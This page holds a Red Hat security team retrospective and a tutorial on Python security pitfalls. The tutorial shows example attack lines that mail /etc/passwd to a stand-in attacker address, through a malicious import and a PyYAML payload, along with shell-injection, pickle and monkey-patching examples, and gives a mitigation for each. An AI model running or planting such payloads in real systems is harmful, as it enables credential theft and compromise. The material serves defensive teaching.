    Fundamentally, all software has bugs; some bugs have a security consequence. If you’re a product vendor you need a security response team to handle tracking and fixing those security flaws. Given that Red Hat products are composed of open source software, this presents some unique challenges in how to deal with security issues in a supply chain comprising thousands of different projects, each with their own development teams, policies, and methodologies. From those early days Red Hat worked out how to do this and do it well. We leveraged the “Getting Things Done” (GTD) methodology to create internal workflows and processes that worked in a stressful environment: where every day could bring something new, and work was mostly comprised of interruptions, you need to have a system you can trust so tasks can be postponed and reprioritised without getting lost.

    "Red Hat has had the best track record in dealing with third-party vulnerabilities. This may be due to the extent of their involvement with third-party vendors and the open-source community, as they often contribute their own patches and work closely with third-party vendors." -- Symantec Internet Security Threat Report 2007

    By 2002 we had started using Common Vulnerabilities and Exposures (CVE) names to identify vulnerabilities, not just during the publication of our advisories, but for helping with the co-ordination of issues in advance between vendors, an unexpected use that was a pleasant surprise to the creators at MITRE. As a CVE editorial board member I would be personally asked to vote on every vulnerability (vulnerabilities would start out as candidates, with a CAN- prefix, before migrating to full CVE- names). As you can imagine that process didn’t last long as the popularity of using CVE names across the industry meant the number of vulnerabilities being handled started to rapidly increase. Now it is uncommon to hear about any vulnerability that doesn’t have a CVE name associated with it. Scaling the CVE process became a big issue in the last few years and hit a crisis point; however in 2016 the DWF project forced changes which should help address these concerns long term, forcing a distributed process instead of one with a bottleneck.

    In the early 2000’s, worms that attacked Linux were fairly common, affecting services that were usually enabled and Internet facing by default such as “sendmail” and “samba”. None of the worms were “0 day” however, they instead exploited vulnerabilities which had had updates to address them released weeks or months prior. September 2002 saw the “Slapper worm” which affected OpenSSL via the Apache web server, “Millen” followed in November 2002 exploiting IMAP. By 2005, Red Hat Enterprise Linux shipped with randomization, NX, and various heap and other protection mechanisms which, together with more secure application defaults (and SELinux enabled by default), helped to disrupt worms. By 2014 logos and branded flaws took over our attentions, and exploits became aimed at making money through botnets and ransomware, or designed for leaking secrets.

    As worms and exploits with clever names were common then, vulnerabilities with clever names, domain names, logos, and other branding are common now. This trend really started in 2014 with the OpenSSL flaw “Heartbleed”. Heartbleed was a serious issue that helped highlight the lack of attention in some key infrastructure projects. But not all the named security issues that followed were important. As we’ve shown in the past just because a vulnerability gets a fancy name doesn’t mean it’s a significant issue (also true in reverse). These issues highlighted the real importance of having a dedicated product security team – a group to weed through the hype and figure out the real impact to the products you supply to your customers. It really has to be a trusted partnership with the customer though, as you have to prove that you’re actually doing work analysing vulnerabilities with security experts, and not simply relying on a press story or third-party vulnerability score. Our Risk Report for 2015 took a look at the branded issues and which ones mattered (and why) and at the Red Hat Summit for the last two years we’ve played a “Game of Flaws” card game, matching logos to vulnerabilities and talking about how to assess risk and figure out the importance of issues.

    Just like Red Hat itself, SRT was known for its openness and transparency. By 2005 we were publishing security data on every vulnerability we addressed along with the metrics on when the issue was public, how long it was embargoed, the issue CWE type, CVSS scoring, and more. We provided XML feeds of vulnerabilities, scripts that could run risk reports, along with detailed blogs on our performance and metrics. In 2006 we started publishing Open Vulnerability Assessment Language (OVAL) definitions for Red Hat Enterprise Linux products, allowing industry standard tools to test systems for outstanding errata. These OVAL definitions are consumed today by tools such as OpenSCAP. Our policy of backporting security fixes caused problems for third-party scanning tools in the early days, but now, by using our data such as our OVAL definitions, they can still give accurate results to our mutual customers. As new security standards emerged, like the Common Vulnerability Reporting Framework (CVRF) in 2011, we’d get involved in the definitions and embrace them, in this case helping define the fields and providing initial example content to help promote the standard. While originally we provided this data in downloadable files on our site, we now have an open API allowing easier access to all our vulnerability data.

    "Red Hat's transparency on its security performance is something that all distributions should strive for -- especially those who would tout their security response" -- Linux Weekly News (July 2008)

    Back in 2005 this transparency on metrics was especially important; as our competitors (of non-open source operating systems) were publishing industry reports comparing vulnerability “days of risk” and doing demonstrations with bags of candies showing how many more vulnerabilities we were fixing than they were. Looking back it’s hard to believe anyone took them seriously. Our open data helped counter these reports and establish that they were not comparing things in a “like-for-like” way; for example treating all issues as having the same severity, or completely not counting issues that were found by the vendor themselves. We even did a joint statement with other Linux distributions, something unprecedented. We still publish frequent “risk reports” which give an honest assessment of how well we handled security issues in our products, as well as helping customers figure out which issues mattered.

    Our team grew substantially over the years, both in numbers of associates and in diversity - with staff spread across time zones, offices, and in ten different countries. Our work also was not just the reactive security work but involved proactive work such as auditing and bug finding too. Red Hat associates in our team also help in upstream communities to help projects assess and deal with security issues and present at technical conferences. We’d also help secure the internal supply chain, such as providing facilities and processes for package signing using hardware cryptographic modules. This led a few years ago to the rebranding as “Red Hat Product Security” to better reflect this multi-faceted nature of the team. Red Hat associates continue to find flaws in Red Hat products as well as in products and services from other companies which we report responsibly. In 2016 for example 12% of issues addressed in our products were discovered by Red Hat associates, and we continue to work with our peers on embargoed security issues.

    In our first year we released 152 advisories to address 147 vulnerabilities. In the last year we released 642 advisories to address 1415 vulnerabilities across more than 100 different products, and 2016 saw us release our 5000th advisory.

    In a subscription-based business you need to continually show value to customers, and we talk about it in terms of providing the highest quality of security service. We are already well known for getting timely updates out for critical issues: for Red Hat Enterprise Linux in 2016, for example, 96% of Critical security issues had an update available the same or next calendar day after the issue was made public. But our differentiator is not just providing timely security updates, it’s a much bigger involvement. Take the issue in bash in 2014 which was branded “Shellshock” as an example. Our team's response was to ensure we provided timely fixes, but also to provide proactive notifications to customers, through our technical account managers and portal notifications, as well as knowledge base and solution articles to help customers quickly understand the issue and their exposure. Our engineers created the final patch used by vendors to address the issue, we provided testing tools, and our technical blog describing the flaw was the definitive source of information which was referenced as authoritative by news articles and even US-CERT.

    My favourite quote comes from Alan Kay in 1971: “The best way to predict the future is to invent it”. I’m reminded every day of the awesome team of world-class security experts we’ve built up at Red Hat and I enthusiastically look forward to helping them define and invent the future of open source product security.

    Posted: 2016-10-17T13:30:00+00:00
  • A bite of Python

    Authored by: Ilya Etingof

    Being easy to pick up and quick to progress from small scripts to larger and more complicated applications, Python is becoming increasingly ubiquitous in computing environments. However, the language's apparent clarity and friendliness can lull the vigilance of software engineers and system administrators, luring them into coding mistakes that may have serious security implications. This article, which primarily targets people who are new to Python, looks at a handful of security-related quirks; experienced developers may well be aware of the peculiarities that follow.

    Input function

    Among the large collection of Python 2 built-in functions, input is a total security disaster. Once called, whatever is read from stdin gets immediately evaluated as Python code:

       $ python2
        >>> input()
        dir()
        ['__builtins__', '__doc__', '__name__', '__package__']
    Clearly, the input function must never ever be used unless data on a script's stdin is fully trusted. Python 2 documentation suggests raw_input as a safe alternative. In Python 3 the input function becomes equivalent to raw_input, thus fixing this weakness once and forever.
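    As an illustration of the safe path, here is a sketch (the function name is hypothetical) that parses untrusted input with ast.literal_eval, which accepts only Python literals and never executes code:

```python
import ast

def read_number(text):
    # literal_eval accepts only Python literals (numbers, strings,
    # tuples, lists, dicts...); it never calls functions or imports.
    value = ast.literal_eval(text)
    if not isinstance(value, (int, float)):
        raise ValueError("expected a number")
    return value

print(read_number("42"))  # 42
try:
    read_number("__import__('os').system('true')")
except (ValueError, SyntaxError):
    print("rejected")  # function calls are not literals, so they fail
```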

    Assert statement

    There is a coding idiom of using assert statements for catching next to impossible conditions in a Python application.

       def verify_credentials(username, password):
           assert username and password, 'Credentials not supplied by caller'
           ... authenticate possibly null user with null password ...

    However, Python does not produce any instructions for assert statements when compiling source code into optimized byte code (e.g. python -O). That silently removes whatever protection against malformed data the programmer wired into their code, leaving the application open to attacks.

    The root cause of this weakness is that the assert mechanism is designed purely for testing purposes, as is done in C++. Programmers must use other means for ensuring data consistency.
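    A minimal sketch of the safer pattern, using illustrative names: validate explicitly and raise, so the check survives python -O:

```python
def verify_credentials(username, password):
    # Unlike assert, an explicit check is never compiled away under -O.
    if not (username and password):
        raise ValueError("credentials not supplied by caller")
    # ... proceed with real authentication here (omitted) ...
    return True
```

The same applies to any input validation: assert is for test suites, while explicit raises are for enforcing invariants in production code.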

    Reusable integers

    Everything is an object in Python. Every object has a unique identity which can be read by the id function. To figure out if two variables or attributes are pointing to the same object the is operator can be used. Integers are objects so the is operation is indeed defined for them:

        >>> 999+1 is 1000
        False

    If the outcome of the above operation looks surprising, keep in mind that the is operator works with identities of two objects -- it does not compare their numerical, or any other, values. However:

        >>> 1+1 is 2
        True

    The explanation for this behavior is that Python maintains a pool of objects representing the first few hundred integers and reuses them to save on memory and object creation. To make it even more confusing, the definition of what "small integer" is differs across Python versions.

    A mitigation here is to never use the is operator for value comparison. The is operator is designed to deal exclusively with object identities.
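    A short demonstration of the difference (the cached range is a CPython implementation detail):

```python
a = 999 + 1
b = 1000
# == compares values and is always well-defined:
print(a == b)  # True
# Whether `a is b` holds depends on interpreter caching (CPython
# interns roughly -5..256), so identity must never stand in for ==.
```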

    Floats comparison

    Working with floating point numbers may get complicated due to inherently limited precision and differences stemming from decimal versus binary fraction representation. One common cause of confusion is that float comparison may sometimes yield unexpected results. Here's a famous example:

       >>> 2.2 * 3.0 == 3.3 * 2.0
       False

    The cause of the above phenomenon is indeed a rounding error:

       >>> (2.2 * 3.0).hex()
       '0x1.a666666666667p+2'
       >>> (3.3 * 2.0).hex()
       '0x1.a666666666666p+2'

    Another interesting observation is related to the Python float type which supports the notion of infinity. One could reason that everything is smaller than infinity:

       >>> 10**1000000 > float('infinity')
       False

    However, prior to Python 3, a type object beats infinity (Python 3 raises a TypeError for such comparisons instead):

       >>> float > float('infinity')
       True

    The best mitigation is to stick to integer arithmetic whenever possible. The next best approach would be to use the decimal stdlib module which attempts to shield users from annoying details and dangerous flaws.

    Generally, when important decisions are made based on the outcome of arithmetic operations, care must be taken not to fall victim to a rounding error. See the floating point arithmetic issues and limitations chapter in the Python documentation.
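    A sketch of both recommended approaches, using math.isclose (Python 3.5+) for tolerance-based comparison and the decimal module for exact decimal arithmetic:

```python
import math
from decimal import Decimal

print(2.2 * 3.0 == 3.3 * 2.0)              # False: binary rounding differs
print(math.isclose(2.2 * 3.0, 3.3 * 2.0))  # True: compares within tolerance
print(Decimal('2.2') * 3 == Decimal('3.3') * 2)  # True: exact arithmetic
```

Note that Decimal must be constructed from strings; Decimal(2.2) would inherit the binary rounding error of the float literal.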

    Private attributes

    Python does not support object attribute hiding, but there is a workaround based on the name mangling of double-underscored attributes. Although the mangling is applied to attribute names appearing in code, attribute names hardcoded into string constants remain unmodified. This may lead to confusing behavior when a double-underscored attribute visibly "hides" from the getattr()/hasattr() functions.

       >>> class X(object):
       ...   def __init__(self):
       ...     self.__private = 1
       ...   def get_private(self):
       ...     return self.__private
       ...   def has_private(self):
       ...     return hasattr(self, '__private')
       >>> x = X()
       >>> x.has_private()
       False
       >>> x.get_private()
       1

    For this privacy feature to work, attribute mangling is not performed on references outside the class definition. That effectively "splits" any given double-underscored attribute into two, depending on where it is referenced from:

       >>> class X(object):
       ...   def __init__(self):
       ...     self.__private = 1
       >>> x = X()
       >>> x.__private
       AttributeError: 'X' object has no attribute '__private'
       >>> x.__private = 2
       >>> x.__private
       2
       >>> hasattr(x, '__private')
       True

    These quirks can turn into a security weakness if a programmer relies on double-underscored attributes for making important decisions in their code without paying attention to the asymmetrical behavior of private attributes.
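    The mangling rule can be demonstrated directly: inside class X the name __private is rewritten to _X__private, and only the mangled name actually exists on the instance:

```python
class X(object):
    def __init__(self):
        self.__private = 1  # stored as _X__private after name mangling

x = X()
print('_X__private' in vars(x))  # True: the mangled name is what exists
print(hasattr(x, '_X__private')) # True
print(hasattr(x, '__private'))   # False: string constants are not mangled
```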

    Module injection

    Python's module import system is powerful and complicated. Modules and packages can be imported by file or directory name found in the search path defined by the sys.path list. Search path initialization is an intricate process that depends on the Python version, platform, and local configuration. To mount a successful attack on a Python application, an attacker needs to find a way to smuggle a malicious Python module into a directory or importable package file that Python will consider when trying to import a module.

    The mitigation is to maintain secure access permissions on all directories and package files in search path to ensure unprivileged users do not have write access to them. Keep in mind that the directory where the initial script invoking Python interpreter resides is automatically inserted into the search path.

    Running a script like this reveals the actual search path:

       $ cat myapp.py
       import sys
       import pprint

       pprint.pprint(sys.path)
    On the Windows platform, the current working directory of the Python process is injected into the search path instead of the script location. On UNIX platforms, the current working directory is automatically inserted into sys.path whenever program code is read from stdin or the command line ("-", "-c", or "-m" options):

       $ echo "import sys, pprint; pprint.pprint(sys.path)" | python -
       $ python -c 'import sys, pprint; pprint.pprint(sys.path)'
       $ cd /tmp
       $ python -m myapp

    To mitigate the risk of module injection from the current working directory, explicitly changing to a safe directory is recommended prior to running Python on Windows or passing code through the command line.

    Another possible source for the search path is the contents of the $PYTHONPATH environment variable. An easy mitigation against sys.path population from the process environment is the -E option to the Python interpreter, which makes it ignore the $PYTHONPATH variable.
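    The effect of -E can be sketched by spawning child interpreters with a poisoned $PYTHONPATH (the /tmp/evil path is purely illustrative):

```python
import subprocess
import sys

env = {"PYTHONPATH": "/tmp/evil"}
probe = "import sys; print('/tmp/evil' in sys.path)"

# Without -E the child interpreter honours $PYTHONPATH...
honoured = subprocess.check_output([sys.executable, "-c", probe], env=env)
# ...with -E the variable is ignored entirely.
ignored = subprocess.check_output([sys.executable, "-E", "-c", probe], env=env)

print(honoured.strip(), ignored.strip())
```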

    Code execution on import

    It may not look obvious that the import statement actually leads to execution of the code in the module being imported. That is why even importing an untrusted module or package is risky. Importing a simple module like this may lead to unpleasant consequences:

       $ cat malicious.py
       import os
       import sys
       os.system('cat /etc/passwd | mail attacker@blackhat.com')
       del sys.modules['malicious']  # pretend it's not imported
       $ python
       >>> import malicious
       >>> dir(malicious)
       Traceback (most recent call last):
       NameError: name 'malicious' is not defined

    Combined with sys.path entry injection attack, it may pave the way to further system exploitation.

    Monkey patching

    The process of changing a Python object's attributes at run-time is known as monkey patching. Being a dynamic language, Python fully supports run-time program introspection and code mutation. Once a malicious module gets imported one way or another, any existing mutable object can be imperceptibly monkey patched without the programmer's consent. Consider this:

       $ cat nowrite.py
       import builtins
       def malicious_open(*args, **kwargs):
          if len(args) > 1 and args[1] == 'w':
             args = ('/dev/null',) + args[1:]
          return original_open(*args, **kwargs)
       original_open, builtins.open = builtins.open, malicious_open

    If the code above gets executed by the Python interpreter, nothing written to files will be stored on the filesystem:

       >>> import nowrite
       >>> open('data.txt', 'w').write('data to store')
       13
       >>> open('data.txt', 'r')
       Traceback (most recent call last):
       FileNotFoundError: [Errno 2] No such file or directory: 'data.txt'

    An attacker could also leverage the Python garbage collector (gc.get_objects()) to get hold of all objects in existence and hack any of them.
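    A minimal sketch of that technique (the class and attribute names are hypothetical):

```python
import gc

class Secret(object):
    def __init__(self, token):
        self.token = token

s = Secret("hunter2")  # reference kept alive elsewhere in the program

# gc.get_objects() returns every container object the collector
# tracks, so instances can be found without holding any reference
# to them in the attacking code.
found = [o for o in gc.get_objects() if isinstance(o, Secret)]
print(found[0].token)
```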

    In Python 2, built-in objects can be accessed via the magic __builtins__ module. One of the known tricks exploiting __builtins__ mutability, which might bring the world to its end, is:

       >>> __builtins__.False, __builtins__.True = True, False
       >>> True
       False
       >>> int(True)
       0

    In Python 3, True and False are keywords, so such assignments raise a SyntaxError and the values can't be manipulated that way.

    Functions are first-class objects in Python; a function object maintains references to many of its properties. In particular, its executable byte code is referenced by the __code__ attribute which, of course, can be modified:

       >>> import shutil
       >>> shutil.copy
       <function copy at 0x7f30c0c66560>
       >>> shutil.copy.__code__ = (lambda src, dst: dst).__code__
       >>> shutil.copy('my_file.txt', '/tmp')
       '/tmp'
       >>> shutil.copy
       <function copy at 0x7f30c0c66560>

    Once the above monkey patch is applied, shutil.copy still looks sane but silently stops working, because its code has been replaced with that of a no-op lambda.

    The type of a Python object is determined by its __class__ attribute. An evil attacker could hopelessly mess things up by resorting to changing the type of live objects:

       >>> class X(object): pass
       >>> class Y(object): pass
       >>> x_obj = X()
       >>> x_obj
       <__main__.X object at 0x7f62dbe5e010>
       >>> isinstance(x_obj, X)
       True
       >>> x_obj.__class__ = Y
       >>> x_obj
       <__main__.Y object at 0x7f62dbe5d350>
       >>> isinstance(x_obj, X)
       False
       >>> isinstance(x_obj, Y)
       True

    The only mitigation against malicious monkey patching is to ensure the authenticity and integrity of the Python modules being imported.

    Shell injection via subprocess

    Python is known as a glue language, so it is quite common for a Python script to delegate system administration tasks to other programs by asking the operating system to execute them, possibly providing additional parameters. The subprocess module offers an easy-to-use, high-level interface for such tasks.

       >>> from subprocess import call
       >>> unvalidated_input = '/bin/true'
       >>> call(unvalidated_input)
       0

    But there is a catch! To make use of UNIX shell services, such as command line parameter expansion, the shell keyword argument to the call function must be set to True. The first argument to call is then passed as-is to the system shell for further parsing and interpretation. Once unvalidated user input reaches the call function (or other functions implemented in the subprocess module), a hole is opened into the underlying system resources.

       >>> from subprocess import call
       >>> unvalidated_input = '/bin/true'
       >>> unvalidated_input += '; cut -d: -f1 /etc/passwd'
       >>> call(unvalidated_input, shell=True)

    It is obviously much safer not to invoke the UNIX shell for external command execution: leave the shell keyword in its default False state and supply the command and its parameters as a list to the subprocess functions. In this second invocation form, neither the command nor its parameters are interpreted or expanded by the shell.

       >>> from subprocess import call
       >>> call(['/bin/ls', '/tmp'])

    If the nature of the application dictates the use of UNIX shell services, it is critically important to sanitize everything that goes to subprocess, making sure that no unwanted shell functionality can be exploited by malicious users. In newer Python versions, shell escaping can be done with the standard library's shlex.quote function.
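    For example, shlex.quote renders shell metacharacters inert by single-quoting the whole string:

```python
import shlex

unvalidated_input = '/bin/true; cut -d: -f1 /etc/passwd'

# quote() wraps the input in single quotes, so the shell sees one
# literal word instead of two chained commands.
safe = shlex.quote(unvalidated_input)
print(safe)
```

A call(safe, shell=True) would then fail to find a program with that literal name, rather than leaking the contents of /etc/passwd.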

    Temporary files

    While vulnerabilities based on improper use of temporary files strike many programming languages, they are still surprisingly common in Python scripts, so it's probably worth mentioning here.

    Vulnerabilities of this kind leverage insecure file system access permissions, possibly involving intermediate steps, ultimately leading to data confidentiality or integrity issues. Detailed description of the problem in general can be found in CWE-377.

    Luckily, Python ships with the tempfile module in its standard library, which offers high-level functions for creating temporary file names "in the most secure manner possible". Beware of the flawed tempfile.mktemp function, which is still present in the library for backward compatibility reasons: tempfile.mktemp must never be used! Instead, use tempfile.TemporaryFile, or tempfile.mkstemp if you need the temporary file to persist after it is closed.
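    A minimal sketch of the safe pattern with tempfile.mkstemp (the suffix and file contents are arbitrary):

```python
import os
import tempfile

# mkstemp creates the file atomically with mode 0o600 and hands back
# an already-open descriptor, eliminating the window between name
# generation and file creation that made tempfile.mktemp exploitable.
fd, path = tempfile.mkstemp(suffix=".txt")
try:
    mode = os.stat(path).st_mode & 0o777  # 0o600: owner read/write only
    with os.fdopen(fd, "w") as f:
        f.write("sensitive data")
finally:
    os.unlink(path)

print(oct(mode))
```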

    Another way to accidentally introduce a weakness is through the use of the shutil.copyfile function. The problem here is that the destination file is created in the most insecure manner possible.

    A security-savvy developer may consider first copying the source file into a random temporary file name, then renaming the temporary file to its final name. While this may look like a good plan, it can be rendered insecure by the shutil.move function if it is used to perform the renaming. The trouble is that if the temporary file is created on a file system other than the one where the final file is to reside, shutil.move will fail to move it atomically (via os.rename) and silently resort to the insecure shutil.copy. A mitigation is to prefer os.rename over shutil.move, as os.rename is guaranteed to fail explicitly on operations across file system boundaries.
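    The safer pattern can be sketched like this (directory and file names are illustrative): create the temporary file inside the destination directory, so the final rename never crosses a file system boundary:

```python
import os
import tempfile

dst_dir = tempfile.mkdtemp()  # stand-in for the real destination dir

# Creating the temporary file in dst_dir keeps it on the same file
# system as the final name, so os.rename below is a single atomic
# operation; across mount points it would raise OSError instead of
# silently degrading to a copy the way shutil.move does.
fd, tmp_path = tempfile.mkstemp(dir=dst_dir)
with os.fdopen(fd, "w") as f:
    f.write("new contents")

final_path = os.path.join(dst_dir, "final.txt")
os.rename(tmp_path, final_path)
```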

    Further complications may arise from the inability of shutil.copy to copy all file metadata, potentially leaving the created file unprotected.

    Although not exclusively specific to Python, care must be taken when modifying files on file systems of non-mainstream types, especially remote ones. Data consistency guarantees tend to differ in the area of file access serialization. As an example, NFSv2 does not honour the O_EXCL flag to the open system call, which is crucial for atomic file creation.

    Insecure deserialization

    Many data serialization techniques exist; among them, Pickle is designed specifically to serialize and deserialize Python objects. Its goal is to dump live Python objects into an octet stream for storage or transmission, then reconstruct them, possibly in another instance of Python. The reconstruction step is inherently risky if the serialized data has been tampered with. The insecurity of Pickle is well recognized and clearly noted in the Python documentation.
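    The risk is easy to demonstrate with pickle's __reduce__ hook; the echoed string stands in for an arbitrary attacker payload:

```python
import os
import pickle

class Evil(object):
    # On unpickling, pickle calls the callable returned here with the
    # supplied arguments -- any function, any arguments.
    def __reduce__(self):
        return (os.system, ("echo pwned",))

payload = pickle.dumps(Evil())
result = pickle.loads(payload)  # runs "echo pwned" in a shell
```

In a real attack, the payload bytes arrive over the network or from a file; merely loading them executes the embedded command.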

    Being a popular configuration file format, YAML is not necessarily perceived as a powerful serialization protocol capable of tricking a deserializer into executing arbitrary code. What makes it even more dangerous is that the de facto default YAML implementation for Python, PyYAML, makes deserialization look very innocent:

       >>> import yaml
       >>> dangerous_input = """
       ... some_option: !!python/object/apply:subprocess.call
       ...   args: [cat /etc/passwd | mail attacker@blackhat.com]
       ...   kwds: {shell: true}
       ... """
       >>> yaml.load(dangerous_input)
       {'some_option': 0}

    ...while /etc/passwd is being stolen. The suggested fix is to always use yaml.safe_load for handling YAML serializations you can't trust. Still, the current PyYAML default feels somewhat provocative, considering that other serialization libraries tend to use the dump/load function names for similar purposes, but in a safe manner.

    Templating engines

    Web application authors adopted Python long ago. Over the course of a decade, quite a number of Web frameworks have been developed. Many of them utilize templating engines for generating dynamic web contents from, well, templates and runtime variables. Aside from web applications, templating engines found their way into completely different software such as the Ansible IT automation tool.

    When content is rendered from static templates and runtime variables, there is a risk of user-controlled code injection through the runtime variables. A successfully mounted attack against a web application may lead to a cross-site scripting vulnerability. The usual mitigation for server-side template injection is to sanitize the contents of template variables before they are interpolated into the final document. The sanitization can be done by denying, stripping off, or escaping characters that are special to any given markup or other domain-specific language.
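    In Python itself, the escaping step can be as simple as the standard library's html.escape, shown here outside any particular templating engine:

```python
import html

tainted = '<script>do_evil()</script>'

# escape() replaces &, <, > (and quotes, by default) with HTML
# entities, so the browser displays the text instead of running it.
print(html.escape(tainted))
```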

    Unfortunately, templating engines do not seem to lean towards tighter security here -- looking at the most popular implementations, none of them applies an escaping mechanism by default, relying instead on the developer's awareness of the risks.

    For example, Jinja2, which is probably one of the most popular tools, renders everything:

       >>> from jinja2 import Environment
       >>> template = Environment().from_string('{{ variable }}')
       >>> template.render(variable='<script>do_evil()</script>')
       '<script>do_evil()</script>'

    ...unless one of many possible escaping mechanisms is explicitly engaged by reversing its default settings:

       >>> from jinja2 import Environment
       >>> template = Environment(autoescape=True).from_string('{{ variable }}')
       >>> template.render(variable='<script>do_evil()</script>')
       '&lt;script&gt;do_evil()&lt;/script&gt;'

    An additional complication is that, in certain use-cases, programmers do not want to sanitize all template variables, intentionally leaving some of them holding potentially dangerous content intact. Templating engines address that need by introducing "filters" to let programmers explicitly sanitize the contents of individual variables. Jinja2 also offers a possibility of toggling the escaping default on a per-template basis.

    It can get even more fragile and complicated if developers choose to escape only a subset of markup language tags, letting others legitimately sneak into the final document.


    This blog post is not meant to be a comprehensive list of all potential traps and shortcomings specific to the Python ecosystem. The goal is to raise awareness of security risks that may come into being once one starts coding in Python, hopefully making programming more enjoyable, and our lives more secure.

    Posted: 2016-09-07T13:30:00+00:00